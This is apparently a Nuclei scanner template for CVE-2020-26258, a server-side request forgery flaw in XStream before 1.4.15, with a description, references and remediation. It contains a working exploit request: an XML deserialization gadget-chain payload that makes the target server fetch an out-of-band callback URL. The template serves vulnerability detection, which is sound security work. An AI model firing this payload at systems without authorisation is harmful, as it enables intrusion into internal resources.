66 lines
2.3 KiB
YAML
66 lines
2.3 KiB
YAML
id: CVE-2020-26258
|
|
|
|
info:
|
|
name: XStream <1.4.15 - Server-Side Request Forgery
|
|
author: pwnhxl
|
|
severity: high
|
|
description: |
|
|
XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
|
|
remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher.
|
|
reference:
|
|
- https://x-stream.github.io/CVE-2020-26258.html
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
|
|
- https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-26258
|
|
- https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 7.7
|
|
cve-id: CVE-2020-26258
|
|
cwe-id: CWE-918
|
|
epss-score: 0.93377
|
|
epss-percentile: 0.98715
|
|
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: xstream_project
|
|
product: xstream
|
|
tags: cve,cve2020,xstream,ssrf,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<map>
|
|
<entry>
|
|
<jdk.nashorn.internal.objects.NativeString>
|
|
<flags>0</flags>
|
|
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
|
|
<dataHandler>
|
|
<dataSource class='javax.activation.URLDataSource'>
|
|
<url>http://{{interactsh-url}}/internal/:</url>
|
|
</dataSource>
|
|
<transferFlavors/>
|
|
</dataHandler>
|
|
<dataLen>0</dataLen>
|
|
</value>
|
|
</jdk.nashorn.internal.objects.NativeString>
|
|
<string>test</string>
|
|
</entry>
|
|
</map>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: Java"
|